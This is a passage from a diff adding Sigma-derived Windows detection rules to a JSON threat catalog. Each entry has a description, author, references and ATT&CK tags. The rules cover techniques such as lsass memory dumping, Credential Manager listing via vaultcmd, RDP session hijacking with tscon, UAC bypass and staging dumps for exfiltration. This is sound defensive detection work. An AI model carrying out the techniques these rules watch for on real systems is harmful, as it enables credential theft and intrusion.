"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_takeown.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "value": "Suspicious Recursive Takeown" + }, + { + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_target_location_shell32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.group-ib.com/resources/threat-research/red-curl-2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" + ] + }, + "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", + "value": "Shell32 DLL Execution in Suspicious Directory" + }, + { + "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_taskkill.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskkill.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", + "value": "Suspicious Execution of Taskkill" + }, + { + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", + "meta": { + "author": "frack113", + "creation_date": "2021/12/11", + "falsepositive": [ + "Administrator, hotline ask to user" + ], + "filename": "proc_creation_win_susp_tasklist_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tasklist_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "63332011-f057-496c-ad8d-d2b6afb27f96", + "value": "Suspicious Tasklist Discovery Command" + }, + { + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_taskmgr_localsystem.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "value": "Taskmgr as LOCAL_SYSTEM" + }, + { + "description": "Detects the creation of a process 
from Windows task manager", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_taskmgr_parent.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "value": "Taskmgr as Parent" + }, + { + "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", + "meta": { + "author": "Avneet Singh @v3t0_, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_tracker_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", + "value": "DLL Injection with Tracker.exe" + }, + { + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_trolleyexpress_procdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.youtube.com/watch?v=Ie831jF0bb0", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "value": "Process Access via TrolleyExpress Exclusion" + }, + { + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_tscon_localsystem.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "9847f263-4a81-424f-970c-875dab15b79b", + "value": "Suspicious TSCON Start as SYSTEM" + }, + { + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_tscon_rdp_redirect.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "value": "Suspicious RDP Redirect Using TSCON" + }, + { + "description": "Detects indicators of a UAC bypass method by mocking directories", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_uac_bypass_trustedpath.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/netero1010/TrustedPath-UACBypass-BOF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "value": "TrustedPath UAC Bypass Pattern" + }, + { + "description": "Detects a suspicious child process of userinit", + "meta": { + "author": "Florian Roth (rule), Samir Bousseaden (idea)", + "creation_date": "2019/06/17", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_userinit_child.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1139811587760562176", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", + "value": "Suspicious Userinit Child 
Process" + }, + { + "description": "Detects the execution of CSharp interactive console by PowerShell", + "meta": { + "author": "Michael R. (@nahamike01)", + "creation_date": "2020/03/08", + "falsepositive": [ + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + ], + "filename": "proc_creation_win_susp_use_of_csharp_console.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_csharp_console.yml" + ], + "tags": [ + "attack.execution", + "attack.t1127" + ] + }, + "uuid": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "value": "Suspicious Use of CSharp Interactive Console" + }, + { + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "meta": { + "author": "Agro (@agro_sev) oscd.community", + "creation_date": "2020/10/10", + "falsepositive": [ + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." 
+ ], + "filename": "proc_creation_win_susp_use_of_sqlps_bin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", + "https://twitter.com/bryon_/status/975835709587075072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "value": "Detection of PowerShell Execution via Sqlps.exe" + }, + { + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "meta": { + "author": "Agro (@agro_sev) oscd.communitly", + "creation_date": "2020/10/13", + "falsepositive": [ + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." 
+ ], + "filename": "proc_creation_win_susp_use_of_sqltoolsps_bin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "value": "SQL Client Tools PowerShell Session Detection" + }, + { + "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", + "meta": { + "author": "Agro (@agro_sev) oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "It's not an uncommon to use te.exe directly to execute legal TAEF tests" + ], + "filename": "proc_creation_win_susp_use_of_te_bin.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" + ], + "tags": [ + "attack.t1218" + ] + }, + "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "value": "Malicious Windows Script Components File Execution by TAEF Detection" + }, + { + "description": "There is an option for a MS VS Just-In-Time Debugger 
\"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "meta": { + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "The process spawned by vsjitdebugger.exe is uncommon." + ], + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/990758590020452353", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", + "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + ], + "tags": [ + "attack.t1218", + "attack.defense_evasion" + ] + }, + "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "value": "Malicious PE Execution by Microsoft Visual Studio Debugger" + }, + { + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/04/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_vaultcmd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vaultcmd.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ] + }, + "uuid": 
"58f50261-c53b-4c88-bd12-1d71f12eda4c", + "value": "Windows Credential Manager Access via VaultCmd" + }, + { + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "meta": { + "author": "Konstantin Grishchenko, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + ], + "filename": "proc_creation_win_susp_vboxdrvinst.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", + "https://twitter.com/pabraeken/status/993497996179492864", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", + "value": "Suspicious VBoxDrvInst.exe Parameters" + }, + { + "description": "Detects suspicious inline VBScript keywords as used by UNC2452", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_vbscript_unc2452.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "value": 
"Suspicious VBScript UN2452 Pattern" + }, + { + "description": "Detects commands that temporarily turn off Volume Snapshots", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/28", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_susp_volsnap_disable.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1354766164166115331", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "value": "Disabled Volume Snapshots" + }, + { + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "meta": { + "author": "bohops", + "creation_date": "2022/10/30", + "falsepositive": [ + "False positives depend on custom use of vsls-agent.exe" + ], + "filename": "proc_creation_win_susp_vslsagent_agentextensionpath_load.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/1583916360404729857", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "43103702-5886-11ed-9b6a-0242ac120002", + "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load" + }, + { + "description": "A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), 
OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_webdav_client_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "value": "Suspicious WebDav Client Execution" + }, + { + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_web_sysaidserver.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml" + ], + "tags": "No established tags" + }, + "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", + "value": "Suspicious SysAidServer Child" + }, + { + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wermgr.yml", + "level": "high", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://www.echotrail.io/insights/search/wermgr.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" + ], + "tags": "No established tags" + }, + "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "value": "Suspicious WERMGR Process Patterns" + }, + { + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_where_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_where_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ] + }, + "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", + "value": "Suspicious Where Execution" + }, + { + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation but rarely used by administrators", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/08/13", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "filename": "proc_creation_win_susp_whoami.yml", + "level": "medium", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "value": "Whoami Execution" + }, + { + "description": "Detects the execution of whoami with suspicious parents or parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/12", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "filename": "proc_creation_win_susp_whoami_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "value": "Whoami Execution Anomaly" + }, + { + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_whoami_as_param.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "value": "WhoAmI as Parameter" + }, + { + "description": "Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + ], + "filename": "proc_creation_win_susp_winrar_dmp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "value": "Winrar Compressing Dump Files" + }, + { + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "meta": { + "author": "Florian Roth, Tigzy", + "creation_date": "2021/11/17", + "falsepositive": [ + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + ], + "filename": "proc_creation_win_susp_winrar_execution.yml", + "level": "high", + "logsource.category": 
"process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1460978167628406785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", + "value": "Winrar Execution in Non-Standard Folder" + }, + { + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_winrm_awl_bypass.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_awl_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl" + }, + { + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate use for administartive purposes. 
Unlikely" + ], + "filename": "proc_creation_win_susp_winrm_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/994405551751815170", + "https://redcanary.com/blog/lateral-movement-winrm-wmi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", + "value": "Remote Code Execute via Winrm.vbs" + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "meta": { + "author": "frack113", + "creation_date": "2021/07/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_winzip.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winzip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", + "value": "Compress Data and Lock With Password for Exfiltration With WINZIP" + }, + { + "description": "Detects WMIC executions in which a event consumer gets created in order to establish persistence", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/25", + "falsepositive": [ + "Legitimate software creating script event consumers" + ], + "filename": "proc_creation_win_susp_wmic_eventconsumer_create.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", + 
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "ebef4391-1a81-4761-a40a-1db446c0e625", + "value": "Suspicious WMIC ActiveScriptEventConsumer Creation" + }, + { + "description": "Detects WMIC executing suspicious or recon commands", + "meta": { + "author": "Michael Haag, Florian Roth, juju4, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "If using Splunk, we recommend | stats count by Computer,CommandLine following for easy hunting by Computer/CommandLine" + ], + "filename": "proc_creation_win_susp_wmic_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", + "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", + "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", + 